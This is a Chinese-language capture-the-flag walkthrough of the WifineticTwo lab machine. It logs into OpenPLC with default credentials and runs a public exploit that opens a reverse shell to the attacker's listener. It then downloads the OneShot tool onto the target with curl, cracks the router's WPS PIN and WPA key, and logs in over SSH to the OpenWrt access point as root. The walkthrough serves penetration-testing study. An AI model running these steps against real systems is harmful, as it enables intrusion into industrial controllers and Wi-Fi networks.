靶场信息

信息收集

Nmap

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.10.11.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 08:26 CST
Nmap scan report for 10.10.11.7
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 232
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfeKNQ.cuV-_IhCQ_wxqDw_YXhnyQfPrYs; Expires=Mon, 18-Mar-2024 00:31:29 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Mon, 18 Mar 2024 00:26:29 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 302 FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 219
|     location: http://0.0.0.0:8080/login
|     vary: Cookie
|     set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfeKNA.oRS8FUzMMG2r0uMBn74kJVLYDXM; Expires=Mon, 18-Mar-2024 00:31:28 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Mon, 18 Mar 2024 00:26:28 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     content-type: text/html; charset=utf-8
|     allow: HEAD, OPTIONS, GET
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfeKNA.VyE-m1IN6YLEIc3k1PwkvE8Wf84; Expires=Mon, 18-Mar-2024 00:31:28 GMT; HttpOnly; Path=/
|     content-length: 0
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Mon, 18 Mar 2024 00:26:28 GMT
|   RTSPRequest: 
|     HTTP/1.1 400 Bad request
|     content-length: 90
|     cache-control: no-cache
|     content-type: text/html
|     connection: close
|     <html><body><h1>400 Bad request</h1>
|     Your browser sent an invalid request.
|_    </body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/18%Time=65F78A34%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,24C,"HTTP/1\.0\x20302\x20FOUND\r\ncontent-type:\x20text/htm
SF:l;\x20charset=utf-8\r\ncontent-length:\x20219\r\nlocation:\x20http://0\
SF:.0\.0\.0:8080/login\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfZn
SF:Jlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\.ZfeKNA\.oRS8FUzMMG2r0uMBn74kJ
SF:VLYDXM;\x20Expires=Mon,\x2018-Mar-2024\x2000:31:28\x20GMT;\x20HttpOnly;
SF:\x20Path=/\r\nserver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x
SF:20Mon,\x2018\x20Mar\x202024\x2000:26:28\x20GMT\r\n\r\n<!DOCTYPE\x20HTML
SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>Red
SF:irecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x2
SF:0be\x20redirected\x20automatically\x20to\x20target\x20URL:\x20<a\x20hre
SF:f=\"/login\">/login</a>\.\x20\x20If\x20not\x20click\x20the\x20link\.")%
SF:r(HTTPOptions,14E,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20text/html
SF:;\x20charset=utf-8\r\nallow:\x20HEAD,\x20OPTIONS,\x20GET\r\nvary:\x20Co
SF:okie\r\nset-cookie:\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\.ZfeKNA\.VyE-
SF:m1IN6YLEIc3k1PwkvE8Wf84;\x20Expires=Mon,\x2018-Mar-2024\x2000:31:28\x20
SF:GMT;\x20HttpOnly;\x20Path=/\r\ncontent-length:\x200\r\nserver:\x20Werkz
SF:eug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\x202024\x2
SF:000:26:28\x20GMT\r\n\r\n")%r(RTSPRequest,CF,"HTTP/1\.1\x20400\x20Bad\x2
SF:0request\r\ncontent-length:\x2090\r\ncache-control:\x20no-cache\r\ncont
SF:ent-type:\x20text/html\r\nconnection:\x20close\r\n\r\n<html><body><h1>4
SF:00\x20Bad\x20request</h1>\nYour\x20browser\x20sent\x20an\x20invalid\x20
SF:request\.\n</body></html>\n")%r(FourOhFourRequest,224,"HTTP/1\.0\x20404
SF:\x20NOT\x20FOUND\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\ncon
SF:tent-length:\x20232\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfcG
SF:VybWFuZW50Ijp0cnVlfQ\.ZfeKNQ\.cuV-_IhCQ_wxqDw_YXhnyQfPrYs;\x20Expires=M
SF:on,\x2018-Mar-2024\x2000:31:29\x20GMT;\x20HttpOnly;\x20Path=/\r\nserver
SF::\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\
SF:x202024\x2000:26:29\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W
SF:3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>404\x20Not\x20Found</ti
SF:tle>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20URL\
SF:x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20aga
SF:in\.</p>\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/18%OT=22%CT=1%CU=36459%PV=Y%DS=2%DC=T%G=Y%TM=65F7
OS:8A5C%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)SEQ(S
OS:P=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AST11NW
OS:7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1=FE88%
OS:W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53AN
OS:NSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=
OS:Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=4
OS:0%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   188.69 ms 10.10.16.1
2   74.16 ms  10.10.11.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.94 seconds
echo "10.10.11.7 wifineticTwo.htb" >> /etc/hosts

Http

这是一个 OpenPLC

搜索到一个默认账号密码

username = openplc
passwrod = openplc

登录成功

漏洞利用

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit OpenPLC                                                                                                     
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated)                                                                                                                                | python/webapps/49803.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

找到了一个 Payload,去尝试一下

┌──(root㉿kali)-[~/Desktop]
└─# python3 49803.py 
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Specify an url target
[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444

似乎是弹回一个 shell 的,去使用 nc 监听一个端口

┌──(root㉿kali)-[~/Desktop]
└─# python3 49803.py -u http://wifinetictwo.htb:8080 -l openplc -p openplc -i 10.10.16.5 -r 4444
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Checking if host http://wifinetictwo.htb:8080 is Up...
[+] Host Up! ...
[+] Trying to authenticate with credentials openplc:openplc
[+] Login success!
[+] PLC program uploading... 
[+] Attempt to Code injection...
[+] Spawning Reverse Shell...
[+] Failed to receive connection :(

并没有成功,让我们去检查一下为什么

发现在programs中,有一个blank_program.st,去修改一下

将第34行的内容从

compile_program = options.url + '/compile-program?file=681871.st'

修改为

compile_program = options.url + '/compile-program?file=blank_program.st'
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.7] 35922
whoami
root

成功获得一个 shell

cd /root
ls
user.txt
cat user.txt
bd4a385eff3d604a5c526c2e4f0cae51

成功获得 user 权限的 flag 文件

权限提升

Docker 逃逸

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z 返回
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237

先获得一个交互式 shell

root@attica02:/opt/PLC/OpenPLC_v3/webserver# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.3  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefb:30c8  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fb:30:c8  txqueuelen 1000  (Ethernet)
        RX packets 669  bytes 67596 (67.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 378  bytes 247558 (247.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 13  bytes 940 (940.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13  bytes 940 (940.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:03:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

查看 ip,发现有一个 wlan0,这是一个无线局域网接口,应该就是 WIFI

https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi

找到了一篇 wifi 渗透测试的教程

ip link show:显示可用的网络接口
iwconfig:显示可用的无线接口
airmon-ng check kill:终止干扰进程
airmon-ng start wlan0:启动监控模式
airmon-ng stop wlan0mon:切换回托管模式
airodump-ng wlan0mon:扫描(默认2.4GHz)
airodump-ng wlan0mon --band a:扫描5GHz频段
iwconfig wlan0 mode monitor:设置为监控模式
iwconfig wlan0mon mode managed:退出监控模式,切换为托管模式
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA":扫描可用的WiFi并显示相关信息

这是教程中提到的命令

root@attica02:/opt/PLC/OpenPLC_v3/webserver# ip link show
ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
    link/ether 00:16:3e:fb:30:c8 brd ff:ff:ff:ff:ff:ff link-netnsid 0
6: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
root@attica02:/opt/PLC/OpenPLC_v3/webserver# iwconfig
iwconfig
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
          
eth0      no wireless extensions.

lo        no wireless extensions.

查看一下信息,然后去扫描一下

root@attica02:/opt/PLC/OpenPLC_v3/webserver# iw dev wlan0 scan
iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 1310.610s [boottime]
        TSF: 1710762862518050 usec (19800d, 11:54:22)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0

这里显示了 WPS 的信息,但是不太完善

https://github.com/nikita-yfh/OneShot-C

找到了一个工具,利用它来攻击吧

┌──(root㉿kali)-[~/Desktop/OneShot-C]
└─# gcc -o oneshot oneshot.c

去编译一下,然后传输到靶机中

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.7] 44344
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@attica06:/opt/PLC/OpenPLC_v3/webserver# curl http://10.10.16.5/oneshot -o oneshot
<rver# curl http://10.10.16.5/oneshot -o oneshot
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 40390  100 40390    0     0  32708      0  0:00:01  0:00:01 --:--:-- 32730

我们已经有了工具,还有 wlan0 的 BSS,直接去进行利用

root@attica07:/opt/PLC/OpenPLC_v3/webserver# sudo ./oneshot -i wlan0 -b 02:00:00:00:01:00 -K
<er# sudo ./oneshot -i wlan0 -b 02:00:00:00:01:00 -K
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: e59f2fcd4db8440e2c0c5941f68d450b
[*] Building Message M2
[P] PKR: e865d2cb9c1908e23e4ec33515b6a69ec7e71a318cb6ddb9a4ca5c03c5c53bc6c1918efadc80afca1e9ddc84384967b0cedb475b20d2494d4fb0b0671ebdfc883d41447d2401823e7b6264b8b63d3a5b7bab225f55e29db8937cdba88eb67b7fac6ef65bdd61f4f7e979691c6804bc60216e3258c1c2f14829cfeef76b05a5bad2859966895872121f62cc5a3759c017f063f10f2086e4da5bba28f0e8202f875c1004f1aea70879826d97cd9820aa2442f0506e6231d3db168d06055a6187cc
[P] PKE: f7f0d3f4be54a61456e79fd24e8edf45c8a152cddea4908e89b50f3f450bf3bcf4b3568f1cbae56a37819e1cf1c4f84547672a6c3da36cb2a228b0d68572db4ec4e93c525fc1881c5b3544956b5dd5347e868709a426a02c864c8b4f488f17f7051ce4d181beadddae4ba557879b3a09a7156bd28c9ac896d375af155e0e5fe925111a7fa62836000cfd350808f2a9234dc32feff87d1e9c1e27a46f5f0100f6ea8137bae71a3b2350a0f58736d9506a7d51870fe2ffe133eecd3ff6398aaf96
[P] Authkey: 8d4d83c8a83255a34262eee5298d1e4e735c1eadd5ac97c2c58720485c1498da
[*] Received WPS Message M3
[P] E-Hash1: 8678dfdec94bc9844104c312f6bdbdb6232affbbb35ab7ea13febd1fff0d452b
[P] E-Hash2: 01442040b610e7f5ff735c796265333045a3b6692ffbef534f816c1eb5bef87c
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter

此时获得了 WIFI 的 creds

plcrouter:NoWWEDoKnowWhaTisReal123!

配置文件/etc/wpa_supplicant/wpa_supplicant-wlan0.conf

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
  ssid="plcrouter"
  psk="NoWWEDoKnowWhaTisReal123!"
  key_mgmt=WPA-PSK
  proto=WPA2
  pairwise=CCMP TKIP
  group=CCMP TKIP
  scan_ssid=1
}

配置文件/etc/systemd/network/25-wlan.network

[Match]
Name=wlan0

[Network]
DHCP=ipv4

接着执行命令

systemctl enable wpa_supplicant@wlan0.service
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service
root@attica05:/etc/wpa_supplicant# ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.31  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:600  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:06:00  txqueuelen 1000  (Ethernet)
        RX packets 9  bytes 1203 (1.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15  bytes 2034 (2.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

查看一下 wlan0 的 ip 地址192.168.1.31,管理员的地址一般是 1.1,当然,这是我们的猜测,可以去尝试一下

root@attica05:/etc/wpa_supplicant# ssh root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.


BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# id
uid=0(root) gid=0(root)
root@ap:~# ifconfig
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 02:00:00:00:01:00  
          inet addr:192.168.1.1  Bcast:0.0.0.0  Mask:255.255.255.0
          inet6 addr: fe80::ff:fe00:100/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:117 errors:0 dropped:0 overruns:0 frame:0
          TX packets:99 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:13450 (13.1 KiB)  TX bytes:14183 (13.8 KiB)

这次应该是进入真正的地址了,可以直接使用 ssh 无密码登入

root@ap:~# ls
root.txt
root@ap:~# cat root.txt
43577af710b0e9240c19308ae819494c

成功拿到 root 权限的 flag 文件